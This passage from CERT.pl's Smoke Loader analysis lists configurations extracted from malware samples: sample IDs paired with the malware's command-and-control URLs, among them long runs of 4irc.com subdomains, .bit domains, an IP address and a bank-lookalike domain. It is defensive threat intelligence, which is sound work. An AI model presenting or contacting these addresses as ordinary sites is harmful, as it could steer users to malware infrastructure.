u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, {u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 44 of 63\n\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://1478520.bid/sm/'},\r\n{u'cnc': u'http://1478520.bid/sm/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://2ancisco.net/hhr_dump/'}, {u'cnc': u'http://dbonzjones.com/hhr_dump/'}, {u'cnc':\r\nu'http://2gillick.com/hhr_dump/'}, {u'cnc': u'http://dbonzjns.org/hhr_dump/'}, {u'cnc':\r\nu'http://seotyy56.co.uk/hhr_dump/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://aladin40chor.com/'},\r\n{u'cnc': u'http://aladin40chor.net/'}, {u'cnc': u'http://aladin40chor.org/'}, {u'cnc':\r\nu'http://aladin40chor.co/'}, {u'cnc': u'http://aladin40chor.us/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://aoids03wkde38.us/'},\r\n{u'cnc': u'http://aoids03wkde38.win/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://buildsae.org/'}, {u'cnc':\r\nu'http://buildsae.us/'}, {u'cnc': u'http://bulentisik.com/'}, {u'cnc': u'http://bumpcaster.com/'}, {u'cnc':\r\nu'http://burcumemlak.org/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://cctoday.info/'}, {u'cnc':\r\nu'http://globalapps.info/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://coifn333.info/'}, {u'cnc':\r\nu'http://coifn332323233.info/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://davaimani.com/'},\r\n{u'cnc': u'http://zemaxfthegdf.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://djsnfjsdnfjksfnsk33.info/'}, {u'cnc': u'http://dksadnidj2d2nksmfs.info/'}, {u'cnc':\r\nu'http://dowaijdiwji32333kdkskd.info/'}, {u'cnc': u'http://vankapolka2992929.info/'}, {u'cnc':\r\nu'http://trolikjamolka92828.info/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://gedmanshwarz432.biz/fs/'}, {u'cnc': u'http://gedmanshwarz432.biz/fs/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://hurtmehard.net/'},\r\n{u'cnc': u'http://hurtmehard.net/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://jabberanimal.biz/'},\r\n{u'cnc': u'http://jabberanimal.biz/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://jamspune26.top/'},\r\n{u'cnc': u'http://battterlog.info/'}, {u'cnc': u'http://namaste-advices.net/'}, {u'cnc': u'http://lojka-s-vilkoy22.com/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 45 of 63\n\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://jokertube.org/'}, {u'cnc':\r\nu'http://jokertube.org/smoke/mp.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://jokertube.org/forum/'},\r\n{u'cnc': u'http://jokertube.org/forum/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://kachapaka.net.in/'},\r\n{u'cnc': u'http://kachapaka.net.in/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://lago666.com/smk/log.php'}, {u'cnc': u'http://lago666.xyz/smk/log.php'}, {u'cnc':\r\nu'http://lago666.online/smk/log.php'}, {u'cnc': u'http://lago666.website/smk/log.php'}, {u'cnc':\r\nu'http://lago666.site/smk/log.php'}, {u'cnc': u'http://lago666.pw/smk/log.php'}, {u'cnc':\r\nu'http://lago666.space/smk/log.php'}, {u'cnc': u'http://lago666.top/smk/log.php'}, {u'cnc':\r\nu'http://lago666.tech/smk/log.php'}, {u'cnc': u'http://lago666.bid/smk/log.php'}, {u'cnc':\r\nu'http://lago666.trade/smk/log.php'}, {u'cnc': u'http://lago666.webcam/smk/log.php'}, {u'cnc':\r\nu'http://lago666.press/smk/log.php'}, {u'cnc': u'http://lago666.host/smk/log.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://livespirit.at/me/'},\r\n{u'cnc': u'http://springhate.at/me/'}, {u'cnc': u'http://treasurehunter.at/me/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://mailserv.xsayeszhaifa.bit/hosting2/'}, {u'cnc': u'http://mailserv.nutsystem323z.bit/hosting2/'},\r\n{u'cnc': u'http://mailserv.nutsystem324z.bit/hosting2/'}, {u'cnc':\r\nu'http://mailserv.nutsystem325z.bit/hosting2/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://microsoftupdate.bit/'},\r\n{u'cnc': u'http://mobileupdate.bit/'}, {u'cnc': u'http://securityupdate.bit/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://r2wtm2gmt7qnq7agmrjxvqsr.info/'}, {u'cnc': u'http://ydertlcu6vfzp3vfg52knrvk.pw/'}, {u'cnc':\r\nu'http://jwpqhtjhvgtm46jfsakxgrbk.pw/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://rozek15.com/'}, {u'cnc':\r\nu'http://bear5678.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://slimbest.su/'}, {u'cnc':\r\nu'http://slimbest.su/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'http://smoke.nutsystem3210z.bit/hosting/'}, {u'cnc': u'http://smoke.nutsystem322z.bit/hosting/'},\r\n{u'cnc': u'http://smoke.nutsystem323z.bit/hosting/'}, {u'cnc':\r\nu'http://smoke.nutsystem324z.bit/hosting/'}, {u'cnc': u'http://smoke.nutsystem325z.bit/hosting/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://superavalanche.at/try/'},\r\n{u'cnc': u'http://8b018df4077060ac0570a2cd9e1f2f9b.at/try/'}, {u'cnc': u'http://springback.at/try/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc': u'http://www.infoweather.net/'},\r\n{u'cnc': u'http://informerpro.info/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 46 of 63\n\n[(u'smk_magic', 2015), (u'sample_id', u'12345'), (u'domains', [{u'cnc':\r\nu'https://dbwealthfunds.info/admin/'}, {u'cnc': u'https://dbwealthtools.info/admin/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'1403'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, {u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 47 of 63\n\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'1traf'), (u'domains', [{u'cnc':\r\nu'http://moverda.biz/paint/index.php'}, {u'cnc': u'http://moverda.online/paint/index.php'}, {u'cnc':\r\nu'http://moverda.su/paint/index.php'}, {u'cnc': u'http://nookerokq.biz/paint/index.php'}, {u'cnc':\r\nu'http://moolanhatt.net/paint/index.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'2'), (u'domains', [{u'cnc': u'http://allerapo.eu/'}, {u'cnc':\r\nu'http://otherapo.click/'}, {u'cnc': u'http://oghtjpo.eu/'}, {u'cnc': u'http://othrebso.com/'}, {u'cnc':\r\nu'http://iehefucu.bid/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'2'), (u'domains', [{u'cnc': u'http://bestwaybest.biz/'}, {u'cnc':\r\nu'http://classicabout.com/'}, {u'cnc': u'http://326b7c22crn.com/'}, {u'cnc':\r\nu'http://32746278djgsf.com/'}, {u'cnc': u'http://svgdfgfuys7.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'2003'), (u'domains', [{u'cnc':\r\nu'http://businessnames1.4irc.com/'}, {u'cnc': u'http://businessnames2.4irc.com/'}, {u'cnc':\r\nu'http://businessnames3.4irc.com/'}, {u'cnc': u'http://businessnames4.4irc.com/'}, {u'cnc':\r\nu'http://businessnames5.4irc.com/'}, {u'cnc': u'http://businessnames6.4irc.com/'}, {u'cnc':\r\nu'http://businessnames7.4irc.com/'}, {u'cnc': u'http://businessnames8.4irc.com/'}, {u'cnc':\r\nu'http://businessnames9.4irc.com/'}, {u'cnc': u'http://businessnames10.4irc.com/'}, {u'cnc':\r\nu'http://businessnames11.4irc.com/'}, {u'cnc': u'http://businessnames12.4irc.com/'}, {u'cnc':\r\nu'http://businessnames13.4irc.com/'}, {u'cnc': u'http://businessnames14.4irc.com/'}, {u'cnc':\r\nu'http://businessnames15.4irc.com/'}, {u'cnc': u'http://businessnames16.4irc.com/'}, {u'cnc':\r\nu'http://businessnames17.4irc.com/'}, {u'cnc': u'http://businessnames18.4irc.com/'}, {u'cnc':\r\nu'http://businessnames19.4irc.com/'}, {u'cnc': u'http://businessnames20.4irc.com/'}, {u'cnc':\r\nu'http://businessnames21.4irc.com/'}, {u'cnc': u'http://businessnames22.4irc.com/'}, {u'cnc':\r\nu'http://businessnames23.4irc.com/'}, {u'cnc': u'http://businessnames24.4irc.com/'}, {u'cnc':\r\nu'http://businessnames25.4irc.com/'}, {u'cnc': u'http://businessnames26.4irc.com/'}, {u'cnc':\r\nu'http://businessnames27.4irc.com/'}, {u'cnc': u'http://businessnames28.4irc.com/'}, {u'cnc':\r\nu'http://businessnames29.4irc.com/'}, {u'cnc': u'http://businessnames30.4irc.com/'}, {u'cnc':\r\nu'http://businessnames31.4irc.com/'}, {u'cnc': u'http://businessnames32.4irc.com/'}, {u'cnc':\r\nu'http://businessnames33.4irc.com/'}, {u'cnc': u'http://businessnames34.4irc.com/'}, {u'cnc':\r\nu'http://businessnames35.4irc.com/'}, {u'cnc': u'http://businessnames36.4irc.com/'}, {u'cnc':\r\nu'http://businessnames37.4irc.com/'}, {u'cnc': u'http://businessnames38.4irc.com/'}, {u'cnc':\r\nu'http://businessnames39.4irc.com/'}, {u'cnc': u'http://businessnames40.4irc.com/'}, {u'cnc':\r\nu'http://businessnames41.4irc.com/'}, {u'cnc': u'http://businessnames42.4irc.com/'}, {u'cnc':\r\nu'http://businessnames43.4irc.com/'}, {u'cnc': u'http://businessnames44.4irc.com/'}, {u'cnc':\r\nu'http://businessnames45.4irc.com/'}, {u'cnc': u'http://businessnames46.4irc.com/'}, {u'cnc':\r\nu'http://businessnames47.4irc.com/'}, {u'cnc': u'http://businessnames48.4irc.com/'}, {u'cnc':\r\nu'http://businessnames49.4irc.com/'}, {u'cnc': u'http://businessnames50.4irc.com/'}, {u'cnc':\r\nu'http://businessnames51.4irc.com/'}, {u'cnc': u'http://businessnames52.4irc.com/'}, {u'cnc':\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 48 of 63\n\nu'http://businessnames53.4irc.com/'}, {u'cnc': u'http://businessnames54.4irc.com/'}, {u'cnc':\r\nu'http://businessnames55.4irc.com/'}, {u'cnc': u'http://businessnames56.4irc.com/'}, {u'cnc':\r\nu'http://businessnames57.4irc.com/'}, {u'cnc': u'http://businessnames58.4irc.com/'}, {u'cnc':\r\nu'http://businessnames59.4irc.com/'}, {u'cnc': u'http://businessnames60.4irc.com/'}, {u'cnc':\r\nu'http://businessnames61.4irc.com/'}, {u'cnc': u'http://businessnames62.4irc.com/'}, {u'cnc':\r\nu'http://businessnames63.4irc.com/'}, {u'cnc': u'http://businessnames64.4irc.com/'}, {u'cnc':\r\nu'http://businessnames65.4irc.com/'}, {u'cnc': u'http://businessnames66.4irc.com/'}, {u'cnc':\r\nu'http://businessnames67.4irc.com/'}, {u'cnc': u'http://businessnames68.4irc.com/'}, {u'cnc':\r\nu'http://businessnames69.4irc.com/'}, {u'cnc': u'http://businessnames70.4irc.com/'}, {u'cnc':\r\nu'http://businessnames71.4irc.com/'}, {u'cnc': u'http://businessnames72.4irc.com/'}, {u'cnc':\r\nu'http://businessnames73.4irc.com/'}, {u'cnc': u'http://businessnames74.4irc.com/'}, {u'cnc':\r\nu'http://businessnames75.4irc.com/'}, {u'cnc': u'http://businessnames76.4irc.com/'}, {u'cnc':\r\nu'http://businessnames77.4irc.com/'}, {u'cnc': u'http://businessnames78.4irc.com/'}, {u'cnc':\r\nu'http://businessnames79.4irc.com/'}, {u'cnc': u'http://businessnames80.4irc.com/'}, {u'cnc':\r\nu'http://businessnames81.4irc.com/'}, {u'cnc': u'http://businessnames82.4irc.com/'}, {u'cnc':\r\nu'http://businessnames83.4irc.com/'}, {u'cnc': u'http://businessnames84.4irc.com/'}, {u'cnc':\r\nu'http://businessnames85.4irc.com/'}, {u'cnc': u'http://businessnames86.4irc.com/'}, {u'cnc':\r\nu'http://businessnames87.4irc.com/'}, {u'cnc': u'http://businessnames88.4irc.com/'}, {u'cnc':\r\nu'http://businessnames89.4irc.com/'}, {u'cnc': u'http://businessnames90.4irc.com/'}, {u'cnc':\r\nu'http://businessnames91.4irc.com/'}, {u'cnc': u'http://businessnames92.4irc.com/'}, {u'cnc':\r\nu'http://businessnames93.4irc.com/'}, {u'cnc': u'http://businessnames94.4irc.com/'}, {u'cnc':\r\nu'http://businessnames95.4irc.com/'}, {u'cnc': u'http://businessnames96.4irc.com/'}, {u'cnc':\r\nu'http://businessnames97.4irc.com/'}, {u'cnc': u'http://businessnames98.4irc.com/'}, {u'cnc':\r\nu'http://businessnames99.4irc.com/'}, {u'cnc': u'http://businessnames100.4irc.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'22222'), (u'domains', [{u'cnc': u'http://hsbc-auth-2.ru/smk/index.php'}, {u'cnc': u'http://wasduherwasgu.net/smk/index.php'}, {u'cnc':\r\nu'http://tanenzwut-tan.su/smk/index.php'}, {u'cnc': u'http://libersmicshliber.com/smk/index.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'28548'), (u'domains', [{u'cnc': u'http://137.74.176.60/full28/'},\r\n{u'cnc': u'http://137.74.176.60/full28/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'4'), (u'domains', [{u'cnc': u'http://allerager.click/'}, {u'cnc':\r\nu'http://othenhrah.click'}, {u'cnc': u'http://oghtmjtr.com/'}, {u'cnc': u'http://othrbnea.com/'}, {u'cnc':\r\nu'http://ienyqucu.bid/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'777'), (u'domains', [{u'cnc':\r\nu'http://loremipsumdolorsitamet.pw/'}, {u'cnc': u'http://atlantikunionwizard.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'a107'), (u'domains', [{u'cnc':\r\nu'http://k.alvaradopartyrentals.com/index.php'}, {u'cnc':\r\nu'http://twinrealty.com/vworker/k/index.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'agres'), (u'domains', [{u'cnc': u'http://bravomir.top/'}, {u'cnc':\r\nu'http://po-system.pw/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'BITUP'), (u'domains', [{u'cnc': u''}, {u'cnc':\r\nu'http://makron.bit/'}, {u'cnc': u'http://makronwin.bit/'}, {u'cnc': u'http://makron.site/'}])]\r\nhttps://www.cert.pl/en/news/single/dissecting-smoke-loader/\r\nPage 49 of 63\n\n[(u'smk_magic', 2015), (u'sample_id', u'BITUP'), (u'domains', [{u'cnc': u'http://makron.bit/'}, {u'cnc':\r\nu'http://makronwin.bit/'}, {u'cnc': u'http://makron.site/'}, {u'cnc': u'http://makron.win/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'Bobbi'), (u'domains', [{u'cnc': u'http://zabugrom.bit/'}, {u'cnc':\r\nu'http://zabugor.bit/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'bravo'), (u'domains', [{u'cnc': u'http://bravomir.top/'}, {u'cnc':\r\nu'http://po-system.pw/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'cbun'), (u'domains', [{u'cnc':\r\nu'http://loremipsumdolorsitamet.pw/'}, {u'cnc': u'http://loremipsumdolorsitamet.pw/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'dekor'), (u'domains', [{u'cnc':\r\nu'http://colwaterlizing.cc/gertyusj/index.php'}, {u'cnc': u'http://fokrifoxdelete.cc/jertysijd/index.php'},\r\n{u'cnc': u'http://koluminatorspice.su/kdfiook/index.php'}, {u'cnc':\r\nu'http://daxokkhankoler.cc/jdfhuisk/index.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'el105'), (u'domains', [{u'cnc': u'http://sinforce.top/'}, {u'cnc':\r\nu'http://force-sin.gdn/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'immo1'), (u'domains', [{u'cnc':\r\nu'https://cyber7.bit/smk/word.php'}, {u'cnc': u'https://cyber7.bit/smk/word.php'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'lo07'), (u'domains', [{u'cnc': u'http://iteamisp.com/'}, {u'cnc':\r\nu'http://mysafespaceco.com/'}, {u'cnc': u'http://mageallink.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'lo09'), (u'domains', [{u'cnc': u'http://iteamisp.com/'}, {u'cnc':\r\nu'http://mysafespaceco.com/'}, {u'cnc': u'http://mageallink.com/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'MY001'), (u'domains', [{u'cnc':\r\nu'http://faprilzexuetequwxtw.top/monster/images/team/'}, {u'cnc':\r\nu'http://faprilzexuetemidrrter.wang/monster/images/team/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'MY002'), (u'domains', [{u'cnc':\r\nu'http://samaytfacjxiozqzxt.top/monster/images/team/'}, {u'cnc':\r\nu'http://samaybktfacjxiqxrt.top/monster/images/team/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'new1'), (u'domains', [{u'cnc': u'http://corpmile3.biz/'}, {u'cnc':\r\nu'http://corpmile2.org/'}, {u'cnc': u'http://corpmile.top/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'RIG'), (u'domains', [{u'cnc': u'http://aoids03wkde38.us/'},\r\n{u'cnc': u'http://aoids03wkde38.win/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'serv2'), (u'domains', [{u'cnc': u'http://corpmile3.biz/'}, {u'cnc':\r\nu'http://corpmile2.org/'}, {u'cnc': u'http://corpmile.top/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'spam2'), (u'domains', [{u'cnc': u'http://zabugrom.bit/'}, {u'cnc':\r\nu'http://zabugor.bit/'}])]\r\n[(u'smk_magic', 2015), (u'sample_id', u'tar1'), (u'domains', [{u'cnc': 